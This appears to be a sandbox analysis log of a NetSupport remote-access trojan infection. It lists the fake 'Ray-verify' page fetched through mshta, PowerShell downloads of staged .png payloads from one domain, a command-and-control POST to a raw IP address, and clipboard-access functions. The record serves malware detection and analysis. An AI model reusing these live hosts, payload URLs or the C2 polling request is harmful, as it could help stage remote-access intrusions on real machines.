                                  Source: global traffic HTTP traffic detected: GET /o/3.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/4.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/5.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/6.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/7.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/8.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/9.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/10.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/11.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /o/12.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: traversecityspringbreak.com
                                  Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                  Source: global traffic DNS traffic detected: DNS query: inspyrehomedesign.com
                                  Source: global traffic DNS traffic detected: DNS query: www.google.com
                                  Source: global traffic DNS traffic detected: DNS query: use.fontawesome.com
                                  Source: global traffic DNS traffic detected: DNS query: i.ibb.co
                                  Source: global traffic DNS traffic detected: DNS query: traversecityspringbreak.com
                                  Source: global traffic DNS traffic detected: DNS query: geo.netsupportsoftware.com
                                  Source: unknown HTTP traffic detected: POST http://92.255.85.135/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 22 Host: 92.255.85.135 Connection: Keep-Alive CMD=POLL INFO=1 ACK=1
                                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:45:15 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Connection: close
                                  Source: client32.exe, client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr String found in binary or memory: http://%s/fakeurl.htm
                                  Source: client32.exe, client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr String found in binary or memory: http://%s/testpage.htm
                                  Source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr String found in binary or memory: http://%s/testpage.htmwininet.dll
                                  Source: client32.exe, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.dr String found in binary or memory: http://127.0.0.1
                                  Source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.dr String found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                  Source: remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                  Source: powershell.exe, 0000000C.00000002.2018709421.000002F279A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
                                  Source: chromecache_83.1.dr String found in binary or memory: http://fontawesome.com
                                  Source: chromecache_83.1.dr String found in binary or memory: http://fontawesome.com/license
                                  Source: client32.exe, 00000015.00000003.2277891273.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000015.00000002.2418160044.00000000061A2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2417429700.0000000006110000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.2277891273.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.12.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                  Source: client32.exe, 00000015.00000002.2418160044.00000000061A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp1j
                                  Source: client32.exe, 00000015.00000002.2417429700.0000000006110000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspD
                                  Source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                  Source: client32.exe, 00000015.00000003.2277891273.00000000013DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asphn
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                  Source: remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.dr String found in binary or memory: http://s2.symcb.com0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.dr String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                  Source: remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://sv.symcd.com0&
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F200E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/1.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/10.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/11.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/12.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/2.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/3.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/4.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/5.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/6.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/7.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/8.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/9.png
                                  Source: powershell.exe, 0000000C.00000002.2015699992.000002F277C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.com/o/o.png
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://traversecityspringbreak.comp
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: client32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                  Source: client32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                  Source: client32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://www.pci.co.uk/support
                                  Source: client32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                  Source: mshta.exe, 0000000B.00000003.1756113861.00000254956E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1757874634.0000025C98246000.00000004.00000020.00020000.00000000.sdmp, Ray-verify[1].htm.11.dr, chromecache_88.1.drString found in binary or memory: http://www.protware.com
                                  Source: mshta.exe, 0000000B.00000002.1767795536.0000025C9A7ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                                  Source: mshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/#
                                  Source: mshta.exe, 0000000B.00000002.1767795536.0000025C9A7ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.comv1
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://www.symauth.com/cps0(
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: http://www.symauth.com/rpa00
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F200E4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                  Source: mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/N
                                  Source: mshta.exe, 0000000B.00000002.1763511986.00000254955F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1765173131.00000254958C0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1763718088.000002549561F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html
                                  Source: mshta.exe, 0000000B.00000002.1765266374.0000025495940000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1768096542.0000025C9C990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html#?
                                  Source: mshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html...I
                                  Source: mshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html...P
                                  Source: mshta.exe, 0000000B.00000003.1759981197.0000025C9831D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlEOBsOVUOCByEBKVfVxgwGKHgImTJOhITa
                                  Source: mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlINetCookies
                                  Source: mshta.exe, 0000000B.00000002.1767795536.0000025C9A7ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlVVC:
                                  Source: mshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.html_
                                  Source: mshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmld
                                  Source: mshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmldV
                                  Source: mshta.exe, 0000000B.00000003.1759981197.0000025C98313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlhttps://inspyrehomedesign.com/Ray-verify.html
                                  Source: mshta.exe, 0000000B.00000003.1762856955.0000025495615000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1763718088.0000025495627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/Ray-verify.htmlp
                                  Source: mshta.exe, 0000000B.00000003.1762367642.0000025495694000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inspyrehomedesign.com/m
                                  Source: mshta.exe, 0000000B.00000003.1762367642.0000025495694000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                  Source: powershell.exe, 0000000C.00000002.2011951167.000002F210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.12.dr, client32.exe.12.drString found in binary or memory: https://www.globalsign.com/repository/0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_1101F6B0 OpenClipboard, GlobalAlloc, GlobalLock, _memmove, GlobalUnlock, EmptyClipboard, SetClipboardData, GlobalFree, MessageBeep, CloseClipboard
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Code function: 21_2_110321E0 GlobalAlloc, GlobalLock, _memmove, GlobalUnlock, IsClipboardFormatAvailable, GetClipboardData, GlobalFree
